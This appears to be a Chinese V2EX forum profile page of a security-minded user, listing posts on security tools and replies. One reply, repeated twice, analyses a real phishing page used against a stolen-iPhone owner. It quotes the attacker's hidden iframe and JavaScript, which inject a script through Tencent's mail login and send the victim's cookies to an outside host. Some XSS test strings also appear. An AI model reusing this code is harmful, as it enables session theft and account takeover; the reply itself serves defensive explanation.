Evi1m0 最近的时间轴更新 Evi1m0 最近的时间轴更新
http://www.google.com/aaa@test#xxx"xx><H1>x1
2014-10-31 11:11:53 +08:00
http://www.google.com/aaa@test#xxx"xxx
2014-10-31 11:10:54 +08:00
http://www.google.com/aaa@test#xxx
2014-10-31 11:10:20 +08:00
 |
Evi1m0V2EX 第 61089 号会员,加入于 2014-04-24 13:39:16 +08:00 |
///////////////////////////////////////////////////////////////////////////////////////////////////rm-rf.gg
| Beehive v0.1.0 Release 信息安全 • Evi1m0 • 2015-07-31 10:01:31 AM • 最后回复来自 Evi1m0 | 8 |
| 12306 售票网站新版验证码识别对抗
1 奇思妙想 • Evi1m0 • 2015-03-26 15:10:40 PM • 最后回复来自 xlrtx
|
32 |
| [Sreg] Search Registration V1 版本发布 分享创造 • Evi1m0 • 2015-03-15 12:01:43 PM • 最后回复来自 v2ex_user001 | 2 |
| test#aaa"test.com title test 沙盒 • Evi1m0 • 2015-06-10 10:09:59 AM • 最后回复来自 Evi1m0 | 5 |
| Jinja2 2.0 /utils.py urlize vulnerability 信息安全 • Evi1m0 • 2015-12-11 13:49:45 PM • 最后回复来自 Evi1m0 | 4 |
| 分享几个 Beebeeto 邀请码 信息安全 • Evi1m0 • 2015-12-11 14:53:12 PM • 最后回复来自 sololivan | 30 |
Evi1m0 最近回复了
2018-02-22 11:14:52 +08:00 回复了 Henryzhao 创建的主题 › 全球工单系统 › 请求 Bilibili 开启二步认证 |
什么明文密码什么脱裤...怎么不动脑子的那么多?
题主提到的二步认证现在被小范围用于被风控的账号中,例如存在弱口令或撞库风险的账号。
题主提到的二步认证现在被小范围用于被风控的账号中,例如存在弱口令或撞库风险的账号。
2015-12-11 13:49:45 +08:00 回复了 Evi1m0 创建的主题 › 信息安全 › Jinja2 2.0 /utils.py urlize vulnerability |
<img src="test">
2015-12-07 17:05:45 +08:00 回复了 graetdk 创建的主题 › 分享创造 › 第三方微博搜索 API 的想法 |
2015-11-09 15:56:05 +08:00 回复了 twoconk 创建的主题 › 设计 › 新上线 web 站,求吐槽 |
2015-11-02 19:47:04 +08:00 回复了 saxon 创建的主题 › 问与答 › 朋友 6S 被偷了,小偷(可能是团伙)发来链接偷取 APPLE ID |
2015-11-02 15:58:08 +08:00 回复了 saxon 创建的主题 › 问与答 › 朋友 6S 被偷了,小偷(可能是团伙)发来链接偷取 APPLE ID |
嗯,刚才测试了一下,如果你的企业邮箱在登录情况下访问了如上网址,是可以登录你的邮箱。
2015-11-02 15:17:27 +08:00 回复了 saxon 创建的主题 › 问与答 › 朋友 6S 被偷了,小偷(可能是团伙)发来链接偷取 APPLE ID |
@BOYPT
两个 iframe ,一些常见网站是人民网的分享接口进行的访问,不是攻击者。
另外一个 iframe 是进行攻击者的操作:
<iframe src="http://society.people.com.cn/n/2015/1031/c1008-27760163.html" style="width:100%;height:1200px;border:none"></iframe>
<iframe src="/htmlpage5.html" style="display:none"></iframe>
---------------
function test(PARAMS) {
var temp = document.createElement("form");
temp.acceptCharset = "utf-8";
//By Wfox
temp.action = 'http://m.exmail.qq.com/cgi-bin/login';
temp.method = "post";
temp.style.display = "none";
for (var x in PARAMS) {
var opt = document.createElement("textarea");
opt.name = x;
opt.value = PARAMS[x];
temp.appendChild(opt);
}
document.body.appendChild(temp);
temp.submit();
}
test({
uin: '\\"</script><script src=http://ryige.com/q/8></script>',
});
document.domain="qq.com";
window.onload=documentrrady;
function documentrrady(){
window.location.href="http://ryige.com/server/AddQQUser?c="+encodeURI(document.cookie)+"&u=lockKey8&r="+encodeURI(document.referrer)
};
两个 iframe ,一些常见网站是人民网的分享接口进行的访问,不是攻击者。
另外一个 iframe 是进行攻击者的操作:
<iframe src="http://society.people.com.cn/n/2015/1031/c1008-27760163.html" style="width:100%;height:1200px;border:none"></iframe>
<iframe src="/htmlpage5.html" style="display:none"></iframe>
---------------
function test(PARAMS) {
var temp = document.createElement("form");
temp.acceptCharset = "utf-8";
//By Wfox
temp.action = 'http://m.exmail.qq.com/cgi-bin/login';
temp.method = "post";
temp.style.display = "none";
for (var x in PARAMS) {
var opt = document.createElement("textarea");
opt.name = x;
opt.value = PARAMS[x];
temp.appendChild(opt);
}
document.body.appendChild(temp);
temp.submit();
}
test({
uin: '\\"</script><script src=http://ryige.com/q/8></script>',
});
document.domain="qq.com";
window.onload=documentrrady;
function documentrrady(){
window.location.href="http://ryige.com/server/AddQQUser?c="+encodeURI(document.cookie)+"&u=lockKey8&r="+encodeURI(document.referrer)
};
2015-08-03 15:24:55 +08:00 回复了 xiongbiao 创建的主题 › 分享创造 › 用 Python 给 Linux 写了个键盘音效软件 - Tickeys - Linux |
nice
Select Language